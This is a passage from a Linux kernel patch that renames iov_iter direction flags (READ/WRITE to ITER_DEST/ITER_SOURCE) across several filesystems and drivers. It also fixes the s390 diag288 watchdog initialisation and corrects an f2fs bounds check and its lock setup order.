+-	goto put_ref;
+ }
+ 
+ static void ufx_usb_disconnect(struct usb_interface *interface)
+diff --git a/drivers/watchdog/diag288_wdt.c b/drivers/watchdog/diag288_wdt.c
+index 4cb10877017c7..6ca5d9515d85c 100644
+--- a/drivers/watchdog/diag288_wdt.c
++++ b/drivers/watchdog/diag288_wdt.c
+@@ -86,7 +86,7 @@ static int __diag288(unsigned int func, unsigned int timeout,
+ 		"1:\n"
+ 		EX_TABLE(0b, 1b)
+ 		: "+d" (err) : "d"(__func), "d"(__timeout),
+-		  "d"(__action), "d"(__len) : "1", "cc");
++		  "d"(__action), "d"(__len) : "1", "cc", "memory");
+ 	return err;
+ }
+ 
+@@ -268,12 +268,21 @@ static int __init diag288_init(void)
+ 	char ebc_begin[] = {
+ 		194, 197, 199, 201, 213
+ 	};
++	char *ebc_cmd;
+ 
+ 	watchdog_set_nowayout(&wdt_dev, nowayout_info);
+ 
+ 	if (MACHINE_IS_VM) {
+-		if (__diag288_vm(WDT_FUNC_INIT, 15,
+-				 ebc_begin, sizeof(ebc_begin)) != 0) {
++		ebc_cmd = kmalloc(sizeof(ebc_begin), GFP_KERNEL);
++		if (!ebc_cmd) {
++			pr_err("The watchdog cannot be initialized\n");
++			return -ENOMEM;
++		}
++		memcpy(ebc_cmd, ebc_begin, sizeof(ebc_begin));
++		ret = __diag288_vm(WDT_FUNC_INIT, 15,
++				   ebc_cmd, sizeof(ebc_begin));
++		kfree(ebc_cmd);
++		if (ret != 0) {
+ 			pr_err("The watchdog cannot be initialized\n");
+ 			return -EINVAL;
+ 		}
+diff --git a/drivers/xen/pvcalls-back.c b/drivers/xen/pvcalls-back.c
+index d6f945fd41474..28b2a1fa25ab5 100644
+--- a/drivers/xen/pvcalls-back.c
++++ b/drivers/xen/pvcalls-back.c
+@@ -129,13 +129,13 @@ static bool pvcalls_conn_back_read(void *opaque)
+ 	if (masked_prod < masked_cons) {
+ 		vec[0].iov_base = data->in + masked_prod;
+ 		vec[0].iov_len = wanted;
+-		iov_iter_kvec(&msg.msg_iter, WRITE, vec, 1, wanted);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, vec, 1, wanted);
+ 	} else {
+ 		vec[0].iov_base = data->in + masked_prod;
+ 		vec[0].iov_len = array_size - masked_prod;
+ 		vec[1].iov_base = data->in;
+ 		vec[1].iov_len = wanted - vec[0].iov_len;
+-		iov_iter_kvec(&msg.msg_iter, WRITE, vec, 2, wanted);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, vec, 2, wanted);
+ 	}
+ 
+ 	atomic_set(&map->read, 0);
+@@ -188,13 +188,13 @@ static bool pvcalls_conn_back_write(struct sock_mapping *map)
+ 	if (pvcalls_mask(prod, array_size) > pvcalls_mask(cons, array_size)) {
+ 		vec[0].iov_base = data->out + pvcalls_mask(cons, array_size);
+ 		vec[0].iov_len = size;
+-		iov_iter_kvec(&msg.msg_iter, READ, vec, 1, size);
++		iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, vec, 1, size);
+ 	} else {
+ 		vec[0].iov_base = data->out + pvcalls_mask(cons, array_size);
+ 		vec[0].iov_len = array_size - pvcalls_mask(cons, array_size);
+ 		vec[1].iov_base = data->out;
+ 		vec[1].iov_len = size - vec[0].iov_len;
+-		iov_iter_kvec(&msg.msg_iter, READ, vec, 2, size);
++		iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, vec, 2, size);
+ 	}
+ 
+ 	atomic_set(&map->write, 0);
+diff --git a/fs/9p/vfs_addr.c b/fs/9p/vfs_addr.c
+index 47b9a1122f344..a19891015f196 100644
+--- a/fs/9p/vfs_addr.c
++++ b/fs/9p/vfs_addr.c
+@@ -40,7 +40,7 @@ static void v9fs_issue_read(struct netfs_io_subrequest *subreq)
+ 	size_t len = subreq->len   - subreq->transferred;
+ 	int total, err;
+ 
+-	iov_iter_xarray(&to, READ, &rreq->mapping->i_pages, pos, len);
++	iov_iter_xarray(&to, ITER_DEST, &rreq->mapping->i_pages, pos, len);
+ 
+ 	total = p9_client_read(fid, pos, &to, &err);
+ 
+@@ -172,7 +172,7 @@ static int v9fs_vfs_write_folio_locked(struct folio *folio)
+ 
+ 	len = min_t(loff_t, i_size - start, len);
+ 
+-	iov_iter_xarray(&from, WRITE, &folio_mapping(folio)->i_pages, start, len);
++	iov_iter_xarray(&from, ITER_SOURCE, &folio_mapping(folio)->i_pages, start, len);
+ 
+ 	/* We should have writeback_fid always set */
+ 	BUG_ON(!v9inode->writeback_fid);
+diff --git a/fs/9p/vfs_dir.c b/fs/9p/vfs_dir.c
+index 000fbaae9b180..3bb95adc9619d 100644
+--- a/fs/9p/vfs_dir.c
++++ b/fs/9p/vfs_dir.c
+@@ -109,7 +109,7 @@ static int v9fs_dir_readdir(struct file *file, struct dir_context *ctx)
+ 			struct iov_iter to;
+ 			int n;
+ 
+-			iov_iter_kvec(&to, READ, &kvec, 1, buflen);
++			iov_iter_kvec(&to, ITER_DEST, &kvec, 1, buflen);
+ 			n = p9_client_read(file->private_data, ctx->pos, &to,
+ 					   &err);
+ 			if (err)
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 1f9298a4bd428..2807bb63f7802 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -24,7 +24,7 @@ ssize_t v9fs_fid_xattr_get(struct p9_fid *fid, const char *name,
+ 	struct iov_iter to;
+ 	int err;
+ 
+-	iov_iter_kvec(&to, READ, &kvec, 1, buffer_size);
++	iov_iter_kvec(&to, ITER_DEST, &kvec, 1, buffer_size);
+ 
+ 	attr_fid = p9_client_xattrwalk(fid, name, &attr_size);
+ 	if (IS_ERR(attr_fid)) {
+@@ -109,7 +109,7 @@ int v9fs_fid_xattr_set(struct p9_fid *fid, const char *name,
+ 	struct iov_iter from;
+ 	int retval, err;
+ 
+-	iov_iter_kvec(&from, WRITE, &kvec, 1, value_len);
++	iov_iter_kvec(&from, ITER_SOURCE, &kvec, 1, value_len);
+ 
+ 	p9_debug(P9_DEBUG_VFS, "name = %s value_len = %zu flags = %d\n",
+ 		 name, value_len, flags);
+diff --git a/fs/afs/cmservice.c b/fs/afs/cmservice.c
+index 0a090d614e762..7dcd59693a0c2 100644
+--- a/fs/afs/cmservice.c
++++ b/fs/afs/cmservice.c
+@@ -298,7 +298,7 @@ static int afs_deliver_cb_callback(struct afs_call *call)
+ 		if (call->count2 != call->count && call->count2 != 0)
+ 			return afs_protocol_error(call, afs_eproto_cb_count);
+ 		call->iter = &call->def_iter;
+-		iov_iter_discard(&call->def_iter, READ, call->count2 * 3 * 4);
++		iov_iter_discard(&call->def_iter, ITER_DEST, call->count2 * 3 * 4);
+ 		call->unmarshall++;
+ 
+ 		fallthrough;
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 230c2d19116d9..104df2964225c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -305,7 +305,7 @@ expand:
+ 	req->actual_len = i_size; /* May change */
+ 	req->len = nr_pages * PAGE_SIZE; /* We can ask for more than there is */
+ 	req->data_version = dvnode->status.data_version; /* May change */
+-	iov_iter_xarray(&req->def_iter, READ, &dvnode->netfs.inode.i_mapping->i_pages,
++	iov_iter_xarray(&req->def_iter, ITER_DEST, &dvnode->netfs.inode.i_mapping->i_pages,
+ 			0, i_size);
+ 	req->iter = &req->def_iter;
+ 
+diff --git a/fs/afs/file.c b/fs/afs/file.c
+index d1cfb235c4b9b..2eeab57df133a 100644
+--- a/fs/afs/file.c
++++ b/fs/afs/file.c
+@@ -324,7 +324,7 @@ static void afs_issue_read(struct netfs_io_subrequest *subreq)
+ 	fsreq->vnode	= vnode;
+ 	fsreq->iter	= &fsreq->def_iter;
+ 
+-	iov_iter_xarray(&fsreq->def_iter, READ,
++	iov_iter_xarray(&fsreq->def_iter, ITER_DEST,
+ 			&fsreq->vnode->netfs.inode.i_mapping->i_pages,
+ 			fsreq->pos, fsreq->len);
+ 
+@@ -346,7 +346,7 @@ static int afs_symlink_read_folio(struct file *file, struct folio *folio)
+ 	fsreq->len	= folio_size(folio);
+ 	fsreq->vnode	= vnode;
+ 	fsreq->iter	= &fsreq->def_iter;
+-	iov_iter_xarray(&fsreq->def_iter, READ, &folio->mapping->i_pages,
++	iov_iter_xarray(&fsreq->def_iter, ITER_DEST, &folio->mapping->i_pages,
+ 			fsreq->pos, fsreq->len);
+ 
+ 	ret = afs_fetch_data(fsreq->vnode, fsreq);
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index 723d162078a3c..9ba7b68375c9f 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -1301,7 +1301,7 @@ static inline void afs_extract_begin(struct afs_call *call, void *buf, size_t si
+ 	call->iov_len = size;
+ 	call->kvec[0].iov_base = buf;
+ 	call->kvec[0].iov_len = size;
+-	iov_iter_kvec(&call->def_iter, READ, call->kvec, 1, size);
++	iov_iter_kvec(&call->def_iter, ITER_DEST, call->kvec, 1, size);
+ }
+ 
+ static inline void afs_extract_to_tmp(struct afs_call *call)
+@@ -1319,7 +1319,7 @@ static inline void afs_extract_to_tmp64(struct afs_call *call)
+ static inline void afs_extract_discard(struct afs_call *call, size_t size)
+ {
+ 	call->iov_len = size;
+-	iov_iter_discard(&call->def_iter, READ, size);
++	iov_iter_discard(&call->def_iter, ITER_DEST, size);
+ }
+ 
+ static inline void afs_extract_to_buf(struct afs_call *call, size_t size)
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index eccc3cd0cb700..c62939e5ea1f0 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -359,7 +359,7 @@ void afs_make_call(struct afs_addr_cursor *ac, struct afs_call *call, gfp_t gfp)
+ 
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, 1, call->request_size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, 1, call->request_size);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= MSG_WAITALL | (call->write_iter ? MSG_MORE : 0);
+@@ -400,7 +400,7 @@ error_do_abort:
+ 					RX_USER_ABORT, ret, "KSD");
+ 	} else {
+ 		len = 0;
+-		iov_iter_kvec(&msg.msg_iter, READ, NULL, 0, 0);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, NULL, 0, 0);
+ 		rxrpc_kernel_recv_data(call->net->socket, rxcall,
+ 				       &msg.msg_iter, &len, false,
+ 				       &call->abort_code, &call->service_id);
+@@ -485,7 +485,7 @@ static void afs_deliver_to_call(struct afs_call *call)
+ 	       ) {
+ 		if (state == AFS_CALL_SV_AWAIT_ACK) {
+ 			len = 0;
+-			iov_iter_kvec(&call->def_iter, READ, NULL, 0, 0);
++			iov_iter_kvec(&call->def_iter, ITER_DEST, NULL, 0, 0);
+ 			ret = rxrpc_kernel_recv_data(call->net->socket,
+ 						     call->rxcall, &call->def_iter,
+ 						     &len, false, &remote_abort,
+@@ -822,7 +822,7 @@ void afs_send_empty_reply(struct afs_call *call)
+ 
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, NULL, 0, 0);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, NULL, 0, 0);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= 0;
+@@ -862,7 +862,7 @@ void afs_send_simple_reply(struct afs_call *call, const void *buf, size_t len)
+ 	iov[0].iov_len		= len;
+ 	msg.msg_name		= NULL;
+ 	msg.msg_namelen		= 0;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, iov, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, iov, 1, len);
+ 	msg.msg_control		= NULL;
+ 	msg.msg_controllen	= 0;
+ 	msg.msg_flags		= 0;
+diff --git a/fs/afs/write.c b/fs/afs/write.c
+index 9ebdd36eaf2fc..08fd456dde67c 100644
+--- a/fs/afs/write.c
++++ b/fs/afs/write.c
+@@ -609,7 +609,7 @@ static ssize_t afs_write_back_from_locked_folio(struct address_space *mapping,
+ 		 */
+ 		afs_write_to_cache(vnode, start, len, i_size, caching);
+ 
+-		iov_iter_xarray(&iter, WRITE, &mapping->i_pages, start, len);
++		iov_iter_xarray(&iter, ITER_SOURCE, &mapping->i_pages, start, len);
+ 		ret = afs_store_data(vnode, &iter, start, false);
+ 	} else {
+ 		_debug("write discard %x @%llx [%llx]", len, start, i_size);
+@@ -1000,7 +1000,7 @@ int afs_launder_folio(struct folio *folio)
+ 		bv[0].bv_page = &folio->page;
+ 		bv[0].bv_offset = f;
+ 		bv[0].bv_len = t - f;
+-		iov_iter_bvec(&iter, WRITE, bv, 1, bv[0].bv_len);
++		iov_iter_bvec(&iter, ITER_SOURCE, bv, 1, bv[0].bv_len);
+ 
+ 		trace_afs_folio_dirty(vnode, tracepoint_string("launder"), folio);
+ 		ret = afs_store_data(vnode, &iter, folio_pos(folio) + f, true);
+diff --git a/fs/aio.c b/fs/aio.c
+index 5b2ff20ad3229..562916d85cba8 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -1552,7 +1552,7 @@ static int aio_read(struct kiocb *req, const struct iocb *iocb,
+ 	if (unlikely(!file->f_op->read_iter))
+ 		return -EINVAL;
+ 
+-	ret = aio_setup_rw(READ, iocb, &iovec, vectored, compat, &iter);
++	ret = aio_setup_rw(ITER_DEST, iocb, &iovec, vectored, compat, &iter);
+ 	if (ret < 0)
+ 		return ret;
+ 	ret = rw_verify_area(READ, file, &req->ki_pos, iov_iter_count(&iter));
+@@ -1580,7 +1580,7 @@ static int aio_write(struct kiocb *req, const struct iocb *iocb,
+ 	if (unlikely(!file->f_op->write_iter))
+ 		return -EINVAL;
+ 
+-	ret = aio_setup_rw(WRITE, iocb, &iovec, vectored, compat, &iter);
++	ret = aio_setup_rw(ITER_SOURCE, iocb, &iovec, vectored, compat, &iter);
+ 	if (ret < 0)
+ 		return ret;
+ 	ret = rw_verify_area(WRITE, file, &req->ki_pos, iov_iter_count(&iter));
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index fd1902573cde3..c05f16a35bcaf 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -5283,7 +5283,7 @@ static int btrfs_ioctl_encoded_read(struct file *file, void __user *argp,
+ 		goto out_acct;
+ 	}
+ 
+-	ret = import_iovec(READ, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
++	ret = import_iovec(ITER_DEST, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
+ 			   &iov, &iter);
+ 	if (ret < 0)
+ 		goto out_acct;
+@@ -5382,7 +5382,7 @@ static int btrfs_ioctl_encoded_write(struct file *file, void __user *argp, bool
+ 	if (args.len > args.unencoded_len - args.unencoded_offset)
+ 		goto out_acct;
+ 
+-	ret = import_iovec(WRITE, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
++	ret = import_iovec(ITER_SOURCE, args.iov, args.iovcnt, ARRAY_SIZE(iovstack),
+ 			   &iov, &iter);
+ 	if (ret < 0)
+ 		goto out_acct;
+diff --git a/fs/ceph/addr.c b/fs/ceph/addr.c
+index dcf701b05cc1c..61f47debec5ac 100644
+--- a/fs/ceph/addr.c
++++ b/fs/ceph/addr.c
+@@ -288,7 +288,7 @@ static bool ceph_netfs_issue_op_inline(struct netfs_io_subrequest *subreq)
+ 	}
+ 
+ 	len = min_t(size_t, iinfo->inline_len - subreq->start, subreq->len);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages, subreq->start, len);
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages, subreq->start, len);
+ 	err = copy_to_iter(iinfo->inline_data + subreq->start, len, &iter);
+ 	if (err == 0)
+ 		err = -EFAULT;
+@@ -327,7 +327,7 @@ static void ceph_netfs_issue_read(struct netfs_io_subrequest *subreq)
+ 	}
+ 
+ 	dout("%s: pos=%llu orig_len=%zu len=%llu\n", __func__, subreq->start, subreq->len, len);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages, subreq->start, len);
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages, subreq->start, len);
+ 	err = iov_iter_get_pages_alloc2(&iter, &pages, len, &page_off);
+ 	if (err < 0) {
+ 		dout("%s: iov_ter_get_pages_alloc returned %d\n", __func__, err);
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 04fd34557de84..6f9580defb2b3 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -1161,7 +1161,7 @@ static void ceph_aio_complete_req(struct ceph_osd_request *req)
+ 				aio_req->total_len = rc + zlen;
+ 			}
+ 
+-			iov_iter_bvec(&i, READ, osd_data->bvec_pos.bvecs,
++			iov_iter_bvec(&i, ITER_DEST, osd_data->bvec_pos.bvecs,
+ 				      osd_data->num_bvecs, len);
+ 			iov_iter_advance(&i, rc);
+ 			iov_iter_zero(zlen, &i);
+@@ -1400,7 +1400,7 @@ ceph_direct_read_write(struct kiocb *iocb, struct iov_iter *iter,
+ 				int zlen = min_t(size_t, len - ret,
+ 						 size - pos - ret);
+ 
+-				iov_iter_bvec(&i, READ, bvecs, num_pages, len);
++				iov_iter_bvec(&i, ITER_DEST, bvecs, num_pages, len);
+ 				iov_iter_advance(&i, ret);
+ 				iov_iter_zero(zlen, &i);
+ 				ret += zlen;
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index eab36e4ea1300..384c7c0e10889 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -761,7 +761,7 @@ cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+ {
+ 	struct msghdr smb_msg = {};
+ 	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
+-	iov_iter_kvec(&smb_msg.msg_iter, READ, &iov, 1, to_read);
++	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
+ 
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+@@ -776,7 +776,7 @@ cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
+ 	 *  and cifs_readv_from_socket sets msg_control and msg_controllen
+ 	 *  so little to initialize in struct msghdr
+ 	 */
+-	iov_iter_discard(&smb_msg.msg_iter, READ, to_read);
++	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
+ 
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+@@ -788,7 +788,7 @@ cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
+ 	struct msghdr smb_msg = {};
+ 	struct bio_vec bv = {
+ 		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
+-	iov_iter_bvec(&smb_msg.msg_iter, READ, &bv, 1, to_read);
++	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
+ 	return cifs_readv_from_socket(server, &smb_msg);
+ }
+ 
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index cd96982099309..209dfc06fd6d1 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -3532,7 +3532,7 @@ static ssize_t __cifs_writev(
+ 		ctx->iter = *from;
+ 		ctx->len = len;
+ 	} else {
+-		rc = setup_aio_ctx_iter(ctx, from, WRITE);
++		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
+ 		if (rc) {
+ 			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+ 			return rc;
+@@ -4276,7 +4276,7 @@ static ssize_t __cifs_readv(
+ 		ctx->iter = *to;
+ 		ctx->len = len;
+ 	} else {
+-		rc = setup_aio_ctx_iter(ctx, to, READ);
++		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
+ 		if (rc) {
+ 			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+ 			return rc;
+diff --git a/fs/cifs/fscache.c b/fs/cifs/fscache.c
+index a1751b9563184..f6f3a6b75601b 100644
+--- a/fs/cifs/fscache.c
++++ b/fs/cifs/fscache.c
+@@ -150,7 +150,7 @@ static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, READ, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_read_operation(&cres, cookie);
+ 	if (ret < 0)
+@@ -180,7 +180,7 @@ static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, WRITE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_write_operation(&cres, cookie);
+ 	if (ret < 0)
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 1ff5b6b0e07a1..78c2d618eb511 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -4737,13 +4737,13 @@ handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+ 			return 0;
+ 		}
+ 
+-		iov_iter_bvec(&iter, WRITE, bvec, npages, data_len);
++		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
+ 	} else if (buf_len >= data_offset + data_len) {
+ 		/* read response payload is in buf */
+ 		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
+ 		iov.iov_base = buf + data_offset;
+ 		iov.iov_len = data_len;
+-		iov_iter_kvec(&iter, WRITE, &iov, 1, data_len);
++		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
+ 	} else {
+ 		/* read response payload cannot be in both buf and pages */
+ 		WARN_ONCE(1, "buf can not contain only a part of read data");
+diff --git a/fs/cifs/transport.c b/fs/cifs/transport.c
+index 575fa8f583422..3851d0aaa2886 100644
+--- a/fs/cifs/transport.c
++++ b/fs/cifs/transport.c
+@@ -347,7 +347,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			.iov_base = &rfc1002_marker,
+ 			.iov_len  = 4
+ 		};
+-		iov_iter_kvec(&smb_msg.msg_iter, WRITE, &hiov, 1, 4);
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, &hiov, 1, 4);
+ 		rc = smb_send_kvec(server, &smb_msg, &sent);
+ 		if (rc < 0)
+ 			goto unmask;
+@@ -368,7 +368,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			size += iov[i].iov_len;
+ 		}
+ 
+-		iov_iter_kvec(&smb_msg.msg_iter, WRITE, iov, n_vec, size);
++		iov_iter_kvec(&smb_msg.msg_iter, ITER_SOURCE, iov, n_vec, size);
+ 
+ 		rc = smb_send_kvec(server, &smb_msg, &sent);
+ 		if (rc < 0)
+@@ -384,7 +384,7 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 			rqst_page_get_length(&rqst[j], i, &bvec.bv_len,
+ 					     &bvec.bv_offset);
+ 
+-			iov_iter_bvec(&smb_msg.msg_iter, WRITE,
++			iov_iter_bvec(&smb_msg.msg_iter, ITER_SOURCE,
+ 				      &bvec, 1, bvec.bv_len);
+ 			rc = smb_send_kvec(server, &smb_msg, &sent);
+ 			if (rc < 0)
+diff --git a/fs/coredump.c b/fs/coredump.c
+index 7bad7785e8e67..095ed821c8ace 100644
+--- a/fs/coredump.c
++++ b/fs/coredump.c
+@@ -853,7 +853,7 @@ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ 	if (dump_interrupted())
+ 		return 0;
+ 	pos = file->f_pos;
+-	iov_iter_bvec(&iter, WRITE, &bvec, 1, PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, &bvec, 1, PAGE_SIZE);
+ 	n = __kernel_write_iter(cprm->file, &iter, &pos);
+ 	if (n != PAGE_SIZE)
+ 		return 0;
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index 6a792a513d6b8..b04f93bc062a8 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -194,7 +194,7 @@ static int erofs_fscache_read_folios_async(struct fscache_cookie *cookie,
+ 
+ 		atomic_inc(&rreq->nr_outstanding);
+ 
+-		iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages,
++		iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages,
+ 				start + done, subreq->len);
+ 
+ 		ret = fscache_read(cres, subreq->start, &iter,
+@@ -290,7 +290,7 @@ static int erofs_fscache_data_read(struct address_space *mapping,
+ 		if (IS_ERR(src))
+ 			return PTR_ERR(src);
+ 
+-		iov_iter_xarray(&iter, READ, &mapping->i_pages, pos, PAGE_SIZE);
++		iov_iter_xarray(&iter, ITER_DEST, &mapping->i_pages, pos, PAGE_SIZE);
+ 		if (copy_to_iter(src + offset, size, &iter) != size) {
+ 			erofs_put_metabuf(&buf);
+ 			return -EFAULT;
+@@ -302,7 +302,7 @@ static int erofs_fscache_data_read(struct address_space *mapping,
+ 
+ 	if (!(map.m_flags & EROFS_MAP_MAPPED)) {
+ 		count = len;
+-		iov_iter_xarray(&iter, READ, &mapping->i_pages, pos, count);
++		iov_iter_xarray(&iter, ITER_DEST, &mapping->i_pages, pos, count);
+ 		iov_iter_zero(count, &iter);
+ 		return count;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index b3184d8b1ce89..ee6836478efe6 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1078,7 +1078,7 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ {
+ 	struct page *node_page;
+ 	nid_t nid;
+-	unsigned int ofs_in_node, max_addrs;
++	unsigned int ofs_in_node, max_addrs, base;
+ 	block_t source_blkaddr;
+ 
+ 	nid = le32_to_cpu(sum->nid);
+@@ -1104,11 +1104,17 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 		return false;
+ 	}
+ 
+-	max_addrs = IS_INODE(node_page) ? DEF_ADDRS_PER_INODE :
+-						DEF_ADDRS_PER_BLOCK;
+-	if (ofs_in_node >= max_addrs) {
+-		f2fs_err(sbi, "Inconsistent ofs_in_node:%u in summary, ino:%u, nid:%u, max:%u",
+-			ofs_in_node, dni->ino, dni->nid, max_addrs);
++	if (IS_INODE(node_page)) {
++		base = offset_in_addr(F2FS_INODE(node_page));
++		max_addrs = DEF_ADDRS_PER_INODE;
++	} else {
++		base = 0;
++		max_addrs = DEF_ADDRS_PER_BLOCK;
++	}
++
++	if (base + ofs_in_node >= max_addrs) {
++		f2fs_err(sbi, "Inconsistent blkaddr offset: base:%u, ofs_in_node:%u, max:%u, ino:%u, nid:%u",
++			base, ofs_in_node, max_addrs, dni->ino, dni->nid);
+ 		f2fs_put_page(node_page, 1);
+ 		return false;
+ 	}
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 67d51f5276061..eaabb85cb4ddb 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -4095,6 +4095,24 @@ try_onemore:
+ 
+ 	sbi->sb = sb;
+ 
++	/* initialize locks within allocated memory */
++	init_f2fs_rwsem(&sbi->gc_lock);
++	mutex_init(&sbi->writepages);
++	init_f2fs_rwsem(&sbi->cp_global_sem);
++	init_f2fs_rwsem(&sbi->node_write);
++	init_f2fs_rwsem(&sbi->node_change);
++	spin_lock_init(&sbi->stat_lock);
++	init_f2fs_rwsem(&sbi->cp_rwsem);
++	init_f2fs_rwsem(&sbi->quota_sem);
++	init_waitqueue_head(&sbi->cp_wait);
++	spin_lock_init(&sbi->error_lock);
++
++	for (i = 0; i < NR_INODE_TYPE; i++) {
++		INIT_LIST_HEAD(&sbi->inode_list[i]);
++		spin_lock_init(&sbi->inode_lock[i]);
++	}
++	mutex_init(&sbi->flush_lock);
++
+ 	/* Load the checksum driver */
+ 	sbi->s_chksum_driver = crypto_alloc_shash("crc32", 0, 0);
+ 	if (IS_ERR(sbi->s_chksum_driver)) {
+@@ -4118,6 +4136,8 @@ try_onemore:
+ 	sb->s_fs_info = sbi;
+ 	sbi->raw_super = raw_super;
+ 
++	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
++
+ 	/* precompute checksum seed for metadata */
+ 	if (f2fs_sb_has_inode_chksum(sbi))
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+@@ -4174,26 +4194,14 @@ try_onemore:
+ 
+ 	/* init f2fs-specific super block info */
+ 	sbi->valid_super_block = valid_super_block;
+-	init_f2fs_rwsem(&sbi->gc_lock);
+-	mutex_init(&sbi->writepages);
+-	init_f2fs_rwsem(&sbi->cp_global_sem);
+-	init_f2fs_rwsem(&sbi->node_write);
+-	init_f2fs_rwsem(&sbi->node_change);
+ 
+ 	/* disallow all the data/node/meta page writes */
+ 	set_sbi_flag(sbi, SBI_POR_DOING);
+-	spin_lock_init(&sbi->stat_lock);
+ 
+ 	err = f2fs_init_write_merge_io(sbi);
+ 	if (err)
+ 		goto free_bio_info;
+ 
+-	spin_lock_init(&sbi->error_lock);
+-	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
+-
